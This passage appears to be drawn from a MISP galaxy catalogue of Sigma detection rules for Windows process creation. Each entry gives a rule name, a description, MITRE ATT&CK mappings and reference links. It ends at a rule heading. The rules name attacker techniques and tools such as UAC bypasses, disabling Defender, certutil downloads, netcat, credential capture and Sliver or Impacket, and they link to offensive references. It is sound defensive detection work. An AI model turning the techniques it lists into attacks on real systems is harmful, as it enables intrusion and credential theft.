  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 10824. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml

PowerShell Base64 Encoded FromBase64String Cmdlet

Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded FromBase64String Cmdlet"

PowerShell Base64 Encoded FromBase64String Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10825. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml

Suspicious PowerShell Parameter Substring

Detects suspicious PowerShell invocation with a parameter substring

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Parameter Substring"

Suspicious PowerShell Parameter Substring has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10826. Table References

Links

http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml

Boot Configuration Tampering Via Bcdedit.EXE

Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware.

The tag is: misp-galaxy:sigma-rules="Boot Configuration Tampering Via Bcdedit.EXE"

Boot Configuration Tampering Via Bcdedit.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10827. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md

https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml

Code Execution via Pcwutl.dll

Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.

The tag is: misp-galaxy:sigma-rules="Code Execution via Pcwutl.dll"

Code Execution via Pcwutl.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10828. Table References

Links

https://twitter.com/harr0ey/status/989617817849876488

https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml

Import PowerShell Modules From Suspicious Directories - ProcCreation

Detects PowerShell scripts that import modules from suspicious directories.

The tag is: misp-galaxy:sigma-rules="Import PowerShell Modules From Suspicious Directories - ProcCreation"

Import PowerShell Modules From Suspicious Directories - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10829. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml

Suspicious Spool Service Child Process

Detects suspicious print spool service (spoolsv.exe) child processes.

The tag is: misp-galaxy:sigma-rules="Suspicious Spool Service Child Process"

Suspicious Spool Service Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 10830. Table References

Links

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml

HackTool - CrackMapExec PowerShell Obfuscation

The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec PowerShell Obfuscation"

HackTool - CrackMapExec PowerShell Obfuscation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 10831. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml

HackTool - Sliver C2 Implant Activity Pattern

Detects process activity patterns as seen being used by Sliver C2 framework implants.

The tag is: misp-galaxy:sigma-rules="HackTool - Sliver C2 Implant Activity Pattern"

HackTool - Sliver C2 Implant Activity Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10832. Table References

Links

https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml

Use of VisualUiaVerifyNative.exe

VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft’s recommended block rules.

The tag is: misp-galaxy:sigma-rules="Use of VisualUiaVerifyNative.exe"

Use of VisualUiaVerifyNative.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10833. Table References

Links

https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml

Firewall Configuration Discovery Via Netsh.EXE

Adversaries may look for details about the network configuration and settings of systems they access, or through information discovery of remote systems.

The tag is: misp-galaxy:sigma-rules="Firewall Configuration Discovery Via Netsh.EXE"

Firewall Configuration Discovery Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 10834. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules

https://ss64.com/nt/netsh.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml

Hacktool Execution - PE Metadata

Detects the execution of different Windows-based hacktools via PE metadata (company, product, etc.), even if the files have been renamed.

The tag is: misp-galaxy:sigma-rules="Hacktool Execution - PE Metadata"

Hacktool Execution - PE Metadata has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10835. Table References

Links

https://github.com/cube0x0

https://www.virustotal.com/gui/search/metadata%253ACube0x0/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml

HackTool - Impacket Tools Execution

Detects the execution of different compiled Windows binaries of the impacket toolset (based on their names or parts of their names, which could lead to false positives).

The tag is: misp-galaxy:sigma-rules="HackTool - Impacket Tools Execution"

HackTool - Impacket Tools Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10836. Table References

Links

https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml

Rundll32 Spawned Via Explorer.EXE

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

The tag is: misp-galaxy:sigma-rules="Rundll32 Spawned Via Explorer.EXE"

Table 10837. Table References

Links

https://redcanary.com/blog/raspberry-robin/

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml

Scheduled Task Executing Payload from Registry

Detects the creation of a scheduled task via schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executing Payload from Registry"

Scheduled Task Executing Payload from Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10838. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml

Potentially Suspicious DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't carry a ".dll" extension, which is often used as a method to evade defenses.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious DLL Registered Via Odbcconf.EXE"

Potentially Suspicious DLL Registered Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10839. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml

Suspicious Remote Child Process From Outlook

Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).

The tag is: misp-galaxy:sigma-rules="Suspicious Remote Child Process From Outlook"

Suspicious Remote Child Process From Outlook has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10840. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://github.com/sensepost/ruler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml

Uncommon Svchost Parent Process

Detects an uncommon svchost parent process.

The tag is: misp-galaxy:sigma-rules="Uncommon Svchost Parent Process"

Uncommon Svchost Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10841. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml

Suspicious WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or of the use of WebDav to launch code (hosted on a WebDav server), or potentially a sign of exploitation of CVE-2023-23397.

The tag is: misp-galaxy:sigma-rules="Suspicious WebDav Client Execution Via Rundll32.EXE"

Suspicious WebDav Client Execution Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 10842. Table References

Links

https://twitter.com/aceresponder/status/1636116096506818562

https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/

https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml

Potentially Suspicious Child Process Of VsCode

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Child Process Of VsCode"

Potentially Suspicious Child Process Of VsCode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10843. Table References

Links

https://twitter.com/nas_bench/status/1618021838407495681

https://twitter.com/nas_bench/status/1618021415852335105

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml

User Added to Local Administrators Group

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

The tag is: misp-galaxy:sigma-rules="User Added to Local Administrators Group"

User Added to Local Administrators Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 10844. Table References

Links

https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml

Script Event Consumer Spawning Process

Detects a suspicious child process of Script Event Consumer (scrcons.exe).

The tag is: misp-galaxy:sigma-rules="Script Event Consumer Spawning Process"

Script Event Consumer Spawning Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10845. Table References

Links

https://redcanary.com/blog/child-processes/

https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml

HackTool - Hashcat Password Cracker Execution

Detects execution of Hashcat.exe with a SAM file extracted from the Windows registry and a password list to crack against.

The tag is: misp-galaxy:sigma-rules="HackTool - Hashcat Password Cracker Execution"

HackTool - Hashcat Password Cracker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"

Table 10846. Table References

Links

https://hashcat.net/wiki/doku.php?id=hashcat

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml

Bypass UAC via CMSTP

Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files.

The tag is: misp-galaxy:sigma-rules="Bypass UAC via CMSTP"

Bypass UAC via CMSTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 10847. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmstp/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md

https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml

Capture Credentials with Rpcping.exe

Detects the use of Rpcping.exe to send an RPC test connection to the target server (-s), forcing the NTLM hash to be sent in the process.

The tag is: misp-galaxy:sigma-rules="Capture Credentials with Rpcping.exe"

Capture Credentials with Rpcping.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10848. Table References

Links

https://twitter.com/vysecurity/status/873181705024266241

https://twitter.com/vysecurity/status/974806438316072960

https://lolbas-project.github.io/lolbas/Binaries/Rpcping/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml

New Process Created Via Taskmgr.EXE

Detects the creation of a process via the Windows Task Manager. This might be an attempt to bypass UAC.

The tag is: misp-galaxy:sigma-rules="New Process Created Via Taskmgr.EXE"

New Process Created Via Taskmgr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10849. Table References

Links

https://twitter.com/ReneFreingruber/status/1172244989335810049

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml

PUA - Advanced Port Scanner Execution

Detects the use of Advanced Port Scanner.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced Port Scanner Execution"

PUA - Advanced Port Scanner Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

Table 10850. Table References

Links

https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml

Disable Windows Defender AV Security Monitoring

Detects attackers attempting to disable Windows Defender using PowerShell.

The tag is: misp-galaxy:sigma-rules="Disable Windows Defender AV Security Monitoring"

Disable Windows Defender AV Security Monitoring has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10852. Table References

Links

https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml

PUA - DefenderCheck Execution

Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.

The tag is: misp-galaxy:sigma-rules="PUA - DefenderCheck Execution"

PUA - DefenderCheck Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

Table 10853. Table References

Links

https://github.com/matterpreter/DefenderCheck

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml

HackTool - SharpView Execution

Adversaries may look for details about the network configuration and settings of systems they access, or through information discovery of remote systems.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpView Execution"

HackTool - SharpView Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10854. Table References

Links

https://github.com/tevora-threat/SharpView/

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml

UAC Bypass WSReset

Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config

The tag is: misp-galaxy:sigma-rules="UAC Bypass WSReset"

UAC Bypass WSReset has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10855. Table References

Links

https://github.com/hfiref0x/UACME

https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf

https://lolbas-project.github.io/lolbas/Binaries/Wsreset/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml

DeviceCredentialDeployment Execution

Detects the execution of DeviceCredentialDeployment to hide a process from view

The tag is: misp-galaxy:sigma-rules="DeviceCredentialDeployment Execution"

DeviceCredentialDeployment Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10856. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/147

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml

WMIC Remote Command Execution

Detects the execution of WMIC to query information on a remote system

The tag is: misp-galaxy:sigma-rules="WMIC Remote Command Execution"

WMIC Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10857. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_execution.yml

PowerShell Base64 Encoded WMI Classes

Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc.

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded WMI Classes"

PowerShell Base64 Encoded WMI Classes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10858. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml

Microsoft Workflow Compiler Execution

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

The tag is: misp-galaxy:sigma-rules="Microsoft Workflow Compiler Execution"

Microsoft Workflow Compiler Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10859. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml

PUA - Netcat Suspicious Execution

Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

The tag is: misp-galaxy:sigma-rules="PUA - Netcat Suspicious Execution"

PUA - Netcat Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 10860. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md

https://nmap.org/ncat/

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml

Suspicious Download Via Certutil.EXE

Detects the execution of certutil with certain flags that allow the utility to download files.

The tag is: misp-galaxy:sigma-rules="Suspicious Download Via Certutil.EXE"

Suspicious Download Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10861. Table References

Links

https://forensicitguy.github.io/agenttesla-vba-certutil-download/

https://twitter.com/egre55/status/1087685529016193025

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

https://lolbas-project.github.io/lolbas/Binaries/Certutil/

https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml

Suspicious Execution of Systeminfo

Detects usage of the "systeminfo" command to retrieve information

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Systeminfo"

Suspicious Execution of Systeminfo has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10862. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml

Domain Trust Discovery Via Dsquery

Detects execution of "dsquery.exe" for domain trust discovery

The tag is: misp-galaxy:sigma-rules="Domain Trust Discovery Via Dsquery"

Domain Trust Discovery Via Dsquery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10863. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md

https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml

Suspicious Scan Loop Network

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system

The tag is: misp-galaxy:sigma-rules="Suspicious Scan Loop Network"

Suspicious Scan Loop Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 10864. Table References

Links

https://ss64.com/ps/foreach-object.html

https://ss64.com/nt/for.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml

Logged-On User Password Change Via Ksetup.EXE

Detects a password change for the logged-on user via "ksetup.exe"

The tag is: misp-galaxy:sigma-rules="Logged-On User Password Change Via Ksetup.EXE"

Table 10865. Table References

Links

https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml

Suspicious JavaScript Execution Via Mshta.EXE

